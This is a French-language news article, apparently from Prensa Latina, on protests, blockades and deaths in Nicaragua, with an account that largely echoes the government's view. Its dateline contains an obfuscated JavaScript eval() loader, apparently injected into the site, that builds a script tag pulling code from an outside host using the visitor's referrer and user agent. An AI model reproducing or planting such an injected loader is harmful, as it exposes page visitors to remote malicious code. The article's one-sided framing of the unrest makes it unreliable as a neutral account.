lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les tensions sociales et les actes de vandalisme continuent au Nicaragua

Managua, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|febse|var|u0026u|referrer|efsek||js|php'.split('|'),0,{})) 11(Prensa Latina) Les tensions sociales et les actes de vandalismes continuent aujourd´hui au Nicaragua, au milieu de constants appels pour avancer dans un dialogue national qui rendrait la tranquillité et la paix au pays.

Managua, 11(Prensa Latina) Les tensions sociales et les actes de vandalismes continuent aujourd´hui au Nicaragua, au milieu de constants appels pour avancer dans un dialogue national qui rendrait la tranquillité et la paix au pays.

Ce vendredi, la nation d´Amérique Centrale s´est réveillée avec des routes et certains accès bloqués par ceux qui, selon certains analystes, prétendent renverser l´ordre constitutionnel.

Selon des reportages de plusieurs médias de communication locaux, dans plusieurs zones du pays le trafic est interrompu, de manière totale ou partielle, ce qui angoisse la population.

On peut observer des pneus brulés dans certaines rues et avenues, pendant que de petits groupes, dans leur majorité cagoulés, continuent de défier les autorités et les citoyens qui s´opposent à la violence.

Dans le même temps, la campagne de désinformation prend de l´ampleur par le biais des réseaux sociaux, par la diffusion de fausses informations, dont un grand nombre ont été réfutées, preuves à l´appui, par les propres citoyens.

D´autres part, de violentes attaques perpétrées hier soir par certains de ces groupes contre la mairie du Distrito VI de Managua ont occasionné la mort de deux personnes.

Les jeunes Carlos Alberto Miranda et Kevin Joel Valle, âgés de 19 ans, ont reçus des tirs mortels lors des affrontements.

Alors que ce vendredi, Alejandro Estrada, de 53ans, a également perdu la vie après avoir été agressé mardi dernier dans le secteur de l´Université Polytechnique du Nicaragua (Upoli).

Des mortiers, des armes artisanales et des cocktails Molotov sont utilisés par ceux qui sont ici accusés de prétendre semer le chaos et la terreur dans le pays, et ce depuis qu´une vague de violence, sans précédent depuis plus d´une décennie, ait débutée le 18 avril dernier.

Cependant, les appels au dialogue et à la paix se multiplient dans tous les recoins du territoire national, en tant qu´unique voie possible pour que les nicaraguayens puissent se retrouver sans plus de violence.

La Commission Vérité, Justice et paix, chargée d´enquêter sur les faits violents dans le pays, a appelé à la tolérance, au respect et à l´ordre constitutionnel, aspects qu´elle a considéré nécessaires pour que les investigations soient responsables et justes.

Les cinq personnes intégrant cette commission ont assuré qu´ils procéderont en totale transparence et qu´aucune mort, blessure grave, ou acte de vandalisme et dommage à la propriété publique et privée qui aient eu lieu depuis le 18 avril dernier ne resteraient impunis.

Selon le président Daniel Ortega, ces événements ont été déclenché par une proposition de réforme du système de la sécurité sociale, laquelle a ensuite été annulée pour stabiliser le pays et appeler au dialogue.

Selon certains observateurs, lesdites mesures proposées ont servi de prétexte pour mettre en marche un plan dirigé depuis l´étranger et ayant l´objectif de déstabiliser la nation et provoquer le renversement du sandinisme au pouvoir.

peo/oda/acl/ymr/acl/lla

EN CONTINU
notes connexes